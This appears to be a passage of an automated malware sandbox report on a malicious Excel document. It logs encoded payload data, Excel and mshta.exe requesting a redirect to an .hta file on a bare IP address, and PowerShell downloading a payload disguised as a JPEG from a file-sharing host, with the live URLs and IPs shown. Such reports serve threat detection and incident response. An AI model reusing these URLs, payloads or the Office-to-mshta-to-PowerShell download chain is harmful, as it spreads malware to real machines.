                                                            Data Ascii: IxBUAJgSEgCFoQAHMQGSgRACKhAAgACIgAAeQwBHgRA1IYEVYAGBEmEVUAhAKRAKUgDA4RABAjBO4gDdIAAGERgSIAGYEQNCGRFC4gDO4AiAKBCICoEd0rgS4QjBKBhAKhACIgAO0hDI4QHC4gDdIgAO4wHHYTNOZTrWhzvxgACdEQAAUgAK4AEIEABAgACOEAAEggCBAABIkrgRUrgRErgR4ACBYAAPIgDCgACIYwBIIACIggD
                                                            Nov 26, 2024 15:49:42.187165976 CET1236INData Raw: 4b 42 48 70 47 6f 45 46 30 52 61 43 4b 68 41 46 30 68 41 46 30 68 44 46 30 78 44 48 30 68 41 43 49 77 42 45 30 51 44 42 41 41 42 49 34 41 43 43 41 51 42 44 49 67 41 49 67 41 43 49 49 41 43 64 67 41 43 43 67 51 48 49 30 42 43 64 67 51 48 49 67 67
                                                            Data Ascii: KBHpGoEF0RaCKhAF0hAF0hDF0xDH0hACIwBE0QDBAABI4ACCAQBDIgAIgACIIACdgACCgQHI0BCdgQHIggAIgQHI0hDOgxBhgACF0BCDAyBhJYEOEgAgcgDO0RAAUACOEAIE4ACBACBOUlgS0RAAcQEBKhAOIgAOIgDCggACIgDCIACCIgDD4gACgACCggAOIQBdgQXCKhDOklgS4ACO0hACwhACERgSUlgSgQVCKRH5IoEOUlg
                                                            Nov 26, 2024 15:49:42.187177896 CET1236INData Raw: 30 62 67 53 6b 62 67 53 55 62 67 53 49 51 45 42 4b 52 69 42 4b 52 42 64 45 62 67 53 49 77 44 48 4d 43 48 41 41 79 41 70 47 6f 45 41 41 53 42 4f 55 61 67 53 45 41 49 47 45 52 67 53 49 51 72 42 4b 52 71 42 4b 68 44 6c 47 6f 45 4f 45 61 67 53 77 52
                                                            Data Ascii: 0bgSkbgSUbgSIQEBKRiBKRBdEbgSIwDHMCHAAyApGoEAASBOUagSEAIGERgSIQrBKRqBKhDlGoEOEagSwRCHUhDO4gAgUQiBKRABAiBOkYgSEAIGUYgSEQAgYQnBKRABAiBZGoEAAQBFGoEAAQBNGoEREoEOkYgSUYgS4QRBKhDIcAFJFYEOEAAG4AHCcABIgQBdUQHDACChFoEAASB5FYEBEAIGUQHBEAIFgACtFoEI0WgSEQB
                                                            Nov 26, 2024 15:49:42.187839985 CET1236INData Raw: 42 46 64 75 56 57 61 73 4e 45 63 30 52 48 53 77 46 32 62 54 35 79 63 73 39 32 59 76 52 33 62 79 42 6c 4c 7a 56 32 59 70 5a 6e 63 6c 4e 6c 4c 69 56 32 56 75 30 57 5a 30 4e 58 65 54 52 44 41 42 45 47 41 41 4d 58 62 79 39 6d 52 75 51 33 59 6c 70 32
                                                            Data Ascii: BFduVWasNEc0RHSwF2bT5ycs92YvR3byBlLzV2YpZnclNlLiV2Vu0WZ0NXeTRDABEGAAMXby9mRuQ3Ylp2byBVeN5SeNJxXfV2YuFGdz5WSf9VZz9GczlGRT81XlNmbhR3cul0XfVGdhVmcDJRby9mRuMXby9mRuM3dvRmbpdlLtVGdzl3UZAQAY5gDO4QAEAyBAAwclNWa2JXZTJWZX5SeN5AABMBAAMXby9mRukXTIAQANAAA
                                                            Nov 26, 2024 15:49:42.187850952 CET1236INData Raw: 67 42 43 42 41 43 42 46 30 52 42 64 55 51 48 46 30 52 42 64 55 51 48 46 41 69 44 4f 45 51 41 67 51 51 42 64 55 51 48 46 30 52 41 44 41 53 43 4b 59 67 41 49 34 51 41 43 41 53 42 49 67 41 45 49 55 51 48 49 55 51 48 4d 46 42 45 49 55 51 48 59 6b 67
                                                            Data Ascii: gBCBACBF0RBdUQHF0RBdUQHFAiDOEQAgQQBdUQHF0RADASCKYgAI4QACASBIgAEIUQHIUQHMFBEIUQHYkgCAMRCIABCF0BCF0BTRABCF0BGJoAATgRCBAABJgQBdgAGYAhDYgRCJAgDIgQBd4AGJUAAJkACQgQBd4AGJYAALkAGJIAAFkgDOgBEJQAAIggBCUQHGMAAAAABEAAAAgABAAAAAQQCGIQWRUlERJBHCQAIK0kEGMQS
                                                            Nov 26, 2024 15:49:42.188855886 CET1236INData Raw: 41 41 58 41 51 47 41 79 42 51 61 41 49 47 41 79 42 51 5a 41 51 47 41 75 42 51 64 41 67 47 41 55 42 41 49 41 45 47 41 73 42 41 62 41 6b 47 41 36 42 77 62 41 30 45 41 63 74 43 41 41 4d 46 41 46 42 41 54 41 6b 45 41 47 42 51 54 41 45 45 41 53 42 77
                                                            Data Ascii: AAXAQGAyBQaAIGAyBQZAQGAuBQdAgGAUBAIAEGAsBAbAkGA6BwbA0EActCAAMFAFBATAkEAGBQTAEEASBwRA8EASBAUZAAAuBwdA8GAkBAdAUHAoBwUA8FATBwUA4UGAAAIAoAANAQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPAoAANAgbA8GAnBQYAIHAEBAIAUGAjBQSAACA6Agb
                                                            Nov 26, 2024 15:49:42.188868999 CET1236INData Raw: 30 44 41 59 42 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 67 43 41 30 77 62 42 41 51 4c 44 41 41 41 35 41 41 4f 41 63 44 41 32 41 41 4e 41 4d 44 41 79 41 51 57 41 67 46 41 58 42 67 56 41 51 46
                                                            Data Ascii: 0DAYBQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AgCA0wbBAQLDAAA5AAOAcDA2AANAMDAyAQWAgFAXBgVAQFASBQUAAFANBwSAoEAIBwRAYEAEBwQAIUMAAARAkEA0BwYAUHAkBwbAIHAQBAbAEGA0BQaAcGApBARhAAAuBwbAkGAzBgcAUGAWBAdA4GAlBgcAIHA1BwQAwFAUBgTAACAzBwdA8GAkBgbAkGAXBAXAQHAmBwbAMHA
                                                            Nov 26, 2024 15:49:42.189538956 CET1236INData Raw: 55 48 41 79 42 41 62 56 41 41 41 6c 42 51 64 41 77 47 41 68 42 67 56 41 51 48 41 6c 42 77 52 52 41 41 41 30 42 67 62 41 55 48 41 76 42 77 51 41 63 48 41 76 42 67 55 41 51 48 41 6c 42 77 52 58 41 41 41 73 42 77 62 41 63 47 41 70 42 67 62 41 4d 58
                                                            Data Ascii: UHAyBAbVAAAlBQdAwGAhBgVAQHAlBwRRAAA0BgbAUHAvBwQAcHAvBgUAQHAlBwRXAAAsBwbAcGApBgbAMXDAAQZAwGAiBQYAQFAkBQYAUGASNBAAwFAPBAcAUGAyBQYAwFAPBAcAUGAyBQYAwFAwBgcA8GAmBQaAwGAlBAXAcHAhBgbAQGAuAAZAEGA0tDAAwFAPBAcAUGAyBQYAACATBwbAYGA0BwdAEGAyBQZAwFAPBAcAUGA
                                                            Nov 26, 2024 15:49:42.307688951 CET1236INData Raw: 42 41 49 41 49 48 41 6c 42 77 63 41 55 46 41 63 42 77 62 41 63 47 41 70 42 51 62 41 45 45 41 63 64 45 41 41 41 43 41 4b 41 51 44 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51
                                                            Data Ascii: BAIAIHAlBwcAUFAcBwbAcGApBQbAEEAcdEAAACAKAQDA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DAKAQDAUGAtBwbAIHAoBwYAkGAOBAIAoDAuBwbAkGA0BQYAMGApBAbAAHAwBQQAoAANsGAAEGA0BQYAQEAgAgbAkGAnBwbAwEAcBAdAwGA1BQYAYGAlBARAwFAhBAdAEGAEBAI


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249163152.231.102.1074433344C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-26 14:49:00 UTC406OUTGET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1
                                                            Accept: */*
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: ljg.cl
                                                            Connection: Keep-Alive
                                                            2024-11-26 14:49:00 UTC594INHTTP/1.1 302 Found
                                                            Server: openresty
                                                            Date: Tue, 26 Nov 2024 14:49:00 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 134
                                                            Connection: close
                                                            X-DNS-Prefetch-Control: off
                                                            X-Frame-Options: SAMEORIGIN
                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                            X-Download-Options: noopen
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 0
                                                            Location: http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta
                                                            Vary: Accept
                                                            Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                            X-Served-By: ljg.cl
                                                            2024-11-26 14:49:00 UTC134INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 35 2f 31 33 32 31 2f 6e 75 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 61 74 74 69 74 75 64 65 77 68 69 63 68 67 69 76 65 6e 75 62 65 73 74 74 68 69 6e 67 73 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 74 69 6d 65 66 6f 72 61 6c 6c 2e 68 74 61
                                                            Data Ascii: Found. Redirecting to http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.2249165152.231.102.1074433648C:\Windows\System32\mshta.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-26 14:49:05 UTC430OUTGET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: ljg.cl
                                                            Connection: Keep-Alive
                                                            2024-11-26 14:49:05 UTC594INHTTP/1.1 302 Found
                                                            Server: openresty
                                                            Date: Tue, 26 Nov 2024 14:49:05 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 134
                                                            Connection: close
                                                            X-DNS-Prefetch-Control: off
                                                            X-Frame-Options: SAMEORIGIN
                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                            X-Download-Options: noopen
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 0
                                                            Location: http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta
                                                            Vary: Accept
                                                            Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                            X-Served-By: ljg.cl
                                                            2024-11-26 14:49:05 UTC134INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 35 2f 31 33 32 31 2f 6e 75 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 61 74 74 69 74 75 64 65 77 68 69 63 68 67 69 76 65 6e 75 62 65 73 74 74 68 69 6e 67 73 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 74 69 6d 65 66 6f 72 61 6c 6c 2e 68 74 61
                                                            Data Ascii: Found. Redirecting to http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.2249168193.30.119.205443924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-26 14:49:25 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                            Host: 3105.filemail.com
                                                            Connection: Keep-Alive
                                                            2024-11-26 14:49:25 UTC328INHTTP/1.1 200 OK
                                                            Content-Length: 2230233
                                                            Content-Type: image/jpeg
                                                            Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                            X-Transfer-ID: ibybhsntnwgamsn
                                                            Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                            Date: Tue, 26 Nov 2024 14:49:24 GMT
                                                            Connection: close
                                                            2024-11-26 14:49:25 UTC2661INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                            2024-11-26 14:49:25 UTC8192INData Raw: b0 30 fe df f8 62 78 7f 89 78 5a 78 7c 7b 65 96 c2 ed ad cc e1 96 8d fb f2 31 ef b0 9f 66 e5 56 3e 29 ad 2e b3 ee 23 6b 5d 91 ef 8f 7d b6 3b 7e d3 fd 99 2c a0 de a4 02 48 e8 3c c8 b9 fd 2b 3d bb ec 8d 18 91 c0 14 68 7f 2c 07 62 d7 b9 50 09 0c 17 b8 3d 46 5b ef 85 1c b2 38 dc d5 6b 7c 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed
                                                            Data Ascii: 0bxxZx|{e1fV>).#k]};~,H<+=h,bP=F[8k|"t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE
                                                            2024-11-26 14:49:25 UTC8192INData Raw: 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61 01 5d c0 f3 d7 34 a4 68 e7 76 21 29 82 51 23 bf 3d 71 72 10 25 94 e5 4e db 27 ae 06 49 82 47 8c ca 5b 75 7b 0e 41 c2 e8 d6 4d 42 3c 21 a8 8e 6c 9a fa 73 8d e8 b4 52 3e aa 43 11 21 36 12 79 b1 78 d3 e9 a3 8a 24 da a1 58 b6 e2 c7 8b 15 fd eb 00 6a 87 4f 11 0c bc 7e 10 6b 9f 9e 20 ec ab 21 3c 05 3d 6f 34 e6 73 24 2c e4 92 ab db fb 66 59 0c ec 14 0f c4 7a 11 81 0f 13 2c 81 ca 90 80 8e 71 e5 2a 74 e1 e3 2a 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa
                                                            Data Ascii: |9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsS
                                                            2024-11-26 14:49:25 UTC8192INData Raw: ab 12 0f 4e 33 cd 78 76 ad e7 f1 18 5e 54 6b 24 ae e3 d3 a1 eb 9e 8b 50 ae 63 6f 2c da b2 95 e7 b6 00 60 9d f5 b0 4f 1a 3f 97 21 6a 46 6e e3 3c b6 a3 57 ad d1 6b 0c 33 3b 20 56 ea 7a 37 39 bd a0 d1 cb a6 12 1d e5 94 35 ad 9e 98 97 8e 46 d3 e8 d8 be d2 ea f4 19 ba 8c 0c 2f 17 97 ef 1e 27 24 80 d9 60 bc 8f 7d a0 7f 43 83 80 c2 75 71 19 14 85 f3 63 b5 3f e1 1f 8b 05 1c 8f a3 d4 ab ed 05 94 82 03 74 e9 c7 e8 70 f2 cd 16 a7 5a 65 2a 17 74 8a 6b b0 1d fb fb e0 7a 1f b4 10 40 82 08 b4 cc 3c 94 8a 67 ab be 42 80 3f 9e 6b e8 1a 11 e1 5a 15 24 16 30 21 20 7f ba 33 c6 6b 34 eb a7 90 36 9e 63 22 b2 b0 03 b0 5a e7 9e 9e ff 00 96 7a 1f 0b d6 14 f0 b8 09 82 d9 54 2a 9a ea 28 60 6b 96 8e 36 f3 18 0d a0 d6 18 79 6e a0 95 e0 f4 23 32 c4 87 56 a6 3a a2 79 2b d0 8c 6a 13 2a
                                                            Data Ascii: N3xv^Tk$Pco,`O?!jFn<Wk3; Vz795F/'$`}Cuqc?tpZe*tkz@<gB?kZ$0! 3k46c"ZzT*(`k6yn#2V:y+j*
                                                            2024-11-26 14:49:25 UTC8192INData Raw: 62 88 3f d7 00 2f 0a c0 4a f9 85 9c a9 53 c7 e1 3d 70 02 0d ac 40 e7 a7 27 db 2d 2f 96 aa c1 0b 07 56 3b ac f0 d7 9c ec cc 1c 79 85 8a d1 f6 b1 58 01 54 69 5c db 50 b3 c9 3d 32 bb 0e e0 07 3c d6 50 80 00 e6 ec 5e 12 30 80 8d cc 41 f6 18 04 11 9b db 77 87 8d 12 32 77 28 dc 3d f3 83 aa 21 21 03 00 38 6c 55 6e 76 b7 63 c6 06 80 9b 7b 04 15 43 b9 39 c6 42 a0 a9 01 81 e9 66 eb 33 a5 4f 2d e8 58 f8 e4 b8 06 24 e0 ee ef ce 06 8f 2c 9d 16 bd f2 84 85 42 a3 6d 9e b8 81 86 40 a0 ed 34 7b de 0e a8 f7 bc 07 80 65 23 90 45 70 0e 11 5c 1b 24 a7 3d 47 b6 26 64 64 41 c7 3f 1c 1a a9 72 4d d6 01 67 27 79 3c 00 3a 56 01 89 6e a7 38 93 c8 eb 9c 4e 07 2d 82 48 1d 32 db 99 ba 91 7d b2 36 d2 d8 3c e5 7b f3 81 72 18 02 4d 50 f8 e5 4f 39 07 a9 ac 8a c0 b8 52 5a 85 5f c4 e1 00 78
                                                            Data Ascii: b?/JS=p@'-/V;yXTi\P=2<P^0Aw2w(=!!8lUnvc{C9Bf3O-X$,Bm@4{e#Ep\$=G&ddA?rMg'y<:Vn8N-H2}6<{rMPO9RZ_x
                                                            2024-11-26 14:49:25 UTC8192INData Raw: d7 d8 ed 6b ff 00 cd 99 5a 9d 42 ce ed 23 46 aa 5b f1 6d ba 27 df 92 70 61 2a 2b dd 67 b6 0a 6b 11 30 3d eb f9 e0 54 4e 88 0d 7a 89 ca c7 3b 33 ed 23 86 e3 07 14 5e 63 10 4d 57 be 11 f4 bb 3a ba ee 3d 00 c0 d3 84 8d 62 a6 8e 46 55 97 a4 32 1e ab fe 56 f8 1e df 1a c4 25 32 46 de 53 f2 63 24 1f 81 07 90 30 cb 0e c8 02 96 b2 dc df b6 39 e2 a8 67 4d 3e b4 70 66 8c 07 0d d4 b2 f0 c7 f9 60 66 97 79 58 09 1c 6d 5e a3 bd 67 d2 3f 64 fa ad 4e 8f c6 3c 5a 6f 0f 81 26 d5 ae 89 76 2b 92 14 a9 96 20 d6 47 b0 24 fd 33 e6 e1 1c 0e 97 f0 cf 65 fb 3e 32 47 37 8d bc 48 4c 8b e1 ea 54 02 07 ff 00 b4 43 ef 80 df 85 06 1f b4 ef 14 31 85 65 bf 12 21 41 2c 08 f2 a6 a1 67 17 fb 7a 61 4d 47 82 94 85 d2 56 f0 7d 1b 02 64 3b 4a 84 65 aa 22 ec 80 bd 0f e7 d7 34 b4 48 cd fb 5f f1 84
                                                            Data Ascii: kZB#F[m'pa*+gk0=TNz;3#^cMW:=bFU2V%2FSc$09gM>pf`fyXm^g?dN<Zo&v+ G$3e>2G7HLTC1e!A,gzaMGV}d;Je"4H_
                                                            2024-11-26 14:49:26 UTC8192INData Raw: 42 8e db c8 68 98 aa 9f e2 00 2d 9f 51 25 8f c6 f3 7e 2f b6 0f 24 71 a0 d5 f8 63 11 d4 04 99 5a ab 8a f4 9e 87 01 6f b4 be 11 e1 5e 09 e1 32 c9 b1 a6 92 40 a8 8a ee 78 20 75 e2 bd f0 bf 65 3e cd 45 0e 88 6a b5 9a 74 92 49 79 02 54 0d 43 e1 77 98 9f 68 bc 62 2f 18 f1 5d 34 46 48 3c b5 23 71 0d 21 5b f7 36 a0 f5 f6 19 bb 0f da 6d 4e 97 4e b1 8d 67 86 34 68 28 83 1c d7 43 b7 e1 c0 db d4 f8 32 aa 7f d9 a4 97 4d 10 21 8c 7a 7d b1 ee 20 df 50 b7 cd 76 39 9f a8 fb 3b a3 d4 3c 6b 36 a7 c4 26 91 97 61 2d 2a b7 96 28 9e 4b 2d f7 02 87 be 23 ff 00 c6 cf 28 0c ba df 0f 56 8c 33 6d 10 ca 37 70 69 4d ad fe 47 3c ff 00 87 f8 d6 a3 5f f6 87 ef b2 be 99 1d 15 99 04 81 fc b5 27 83 b4 2f 36 45 f5 c0 f5 9e 29 e0 11 ea 3c 2f 4d 2e 97 4f 2c d2 41 12 a4 71 82 22 66 5f 48 a6 2c
                                                            Data Ascii: Bh-Q%~/$qcZo^2@x ue>EjtIyTCwhb/]4FH<#q![6mNNg4h(C2M!z} Pv9;<k6&a-*(K-#(V3m7piMG<_'/6E)</M.O,Aq"f_H,
                                                            2024-11-26 14:49:26 UTC8192INData Raw: 5a c0 4d 96 40 e1 c8 22 8f 52 33 5e 27 f3 21 d9 18 62 c4 75 3d b3 37 52 e0 c6 42 22 95 bb 0c 07 39 48 f5 93 47 d0 90 0f b6 03 fb 25 da 54 b9 a5 e4 df 19 d2 38 30 87 95 d4 b0 fc 23 07 a6 d4 34 ed 27 9c d6 08 ae bc e2 8c 8d e6 ec 76 24 5f 03 00 e9 2b ca f7 e9 a5 3e 91 8e c5 12 82 cf 22 06 2c 39 2b db 05 a4 58 e1 05 59 14 1b e2 fa e6 a6 9e 15 92 23 b8 10 4f 00 2f 71 81 9b 2b c7 05 8d c1 55 ba 8e bc e0 a4 d3 19 81 40 79 ed 58 6d 4c 51 79 eb 09 52 59 b9 b3 db 39 d9 20 84 c8 8e 16 48 d8 10 a7 a9 c0 a4 7a 39 1a 0d a6 42 8d d3 60 00 5d 77 38 b4 41 e0 9a 4a 76 37 e9 dc 3b e6 aa eb 23 75 90 95 06 46 5d c5 87 7b 1d 33 30 80 aa bd ec 13 5e f8 06 82 4f 2a 55 46 da 41 36 77 0e 4e 5b 5e ac da 80 e1 6d 5b b1 3d 31 78 2d e6 de 50 d0 15 64 e6 93 2e f4 50 79 f8 fb 60 66 24
                                                            Data Ascii: ZM@"R3^'!bu=7RB"9HG%T80#4'v$_+>",9+XY#O/q+U@yXmLQyRY9 Hz9B`]w8AJv7;#uF]{30^O*UFA6wN[^m[=1x-Pd.Py`f$
                                                            2024-11-26 14:49:26 UTC8192INData Raw: 0c 58 a8 a2 2c 13 dc 11 cd 76 f7 f8 5e 68 7d e6 35 88 ac 72 6c 5f bb f9 67 6d d6 ed f6 6a fe 17 d7 32 84 12 34 42 40 14 0e 48 05 80 26 8f 34 3a 9c 1a b0 0b 43 92 dc fc b0 34 f5 3a 94 10 33 47 29 df 71 ed bf 75 5a 3f cf 14 7d 53 b4 f2 ea 03 d3 39 63 7f ef 58 3f a1 39 4a 12 a0 55 04 d7 26 bd 87 27 2c f1 88 89 08 6e 89 20 86 04 57 1d fb f5 ed 81 54 08 c4 29 70 b6 40 dc 6f a7 d2 f2 58 42 b3 85 56 12 28 ea c1 48 07 9f 8f 3f 9e 09 9d d0 90 c2 88 f8 7f 5c a2 02 e7 a8 06 89 b3 f0 e7 01 aa 56 31 90 c0 06 50 5e ff 00 84 dd 57 d7 af d7 28 8d b6 c2 dd 73 5e c7 05 0b 5b 10 f6 45 5e 31 1c 42 40 cc 17 6a a8 b1 80 2f 33 71 2b 44 91 ed 97 8b 4b b9 77 c8 48 27 b6 1a 2d 2a b3 07 66 fc 42 c6 41 5d 4c 6c 51 5a d7 f8 4f b6 04 cf 18 fb ab 79 62 c5 8b f7 cf 6d fb 2a 9a 05 d4 7d
                                                            Data Ascii: X,v^h}5rl_gmj24B@H&4:C4:3G)quZ?}S9cX?9JU&',n WT)p@oXBV(H?\V1P^W(s^[E^1B@j/3q+DKwH'-*fBA]LlQZOybm*}
                                                            2024-11-26 14:49:26 UTC8192INData Raw: a4 0a 36 16 0a 84 10 5a b9 07 b6 55 a0 24 f9 b2 d9 0a 79 00 73 ed 7f 1c 95 8d 9e 59 15 56 96 81 56 61 c1 04 57 4c 0c ff 00 13 9e 51 e5 02 77 46 56 98 a8 e1 be 38 ac a2 99 d2 95 4b 05 a5 51 57 9b 3a 9d 2b 34 2b 19 6b 01 40 6b 18 8b e9 01 93 7b 29 63 6a b4 79 3e d8 09 78 7c 86 39 0f 27 71 0d 6b d7 b1 c8 81 1d 57 78 6b 79 14 b3 5f 63 d3 26 5d 39 d3 ea 51 85 8b 62 2a eb 0b fe ce 9a 69 0b 35 a2 f2 78 ba c0 8d 34 86 25 89 1e f7 2b 80 dc fe 2e 0e 46 a3 52 e3 53 14 32 29 a2 e4 ee 04 51 5f 62 32 1e 02 8e 1c d9 da 68 fc ab ae 0e 48 dd 98 39 e4 83 6a 70 07 aa 55 01 5c bb 29 5d ca 42 fb 1e 9c 62 31 07 2b 3b 31 62 a0 0d bd bf d7 6c d2 97 6c ff 00 c2 40 ba 6b ae b8 b8 78 d5 5a 31 4c b6 47 18 09 19 1e 39 37 97 6a 65 04 01 d0 1a ac 89 b5 01 64 52 8c 7d 3c b7 5e 4e 56 68
                                                            Data Ascii: 6ZU$ysYVVaWLQwFV8KQW:+4+k@k{)cjy>x|9'qkWxky_c&]9Qb*i5x4%+.FRS2)Q_b2hH9jpU\)]Bb1+;1bll@kxZ1LG97jedR}<^NVh


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:09:48:05
                                                            Start date:26/11/2024
                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                            Imagebase:0x13f7e0000
                                                            File size:28'253'536 bytes
                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:4
                                                            Start time:09:49:01
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\System32\mshta.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                            Imagebase:0x13ff10000
                                                            File size:13'824 bytes
                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:49:08
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
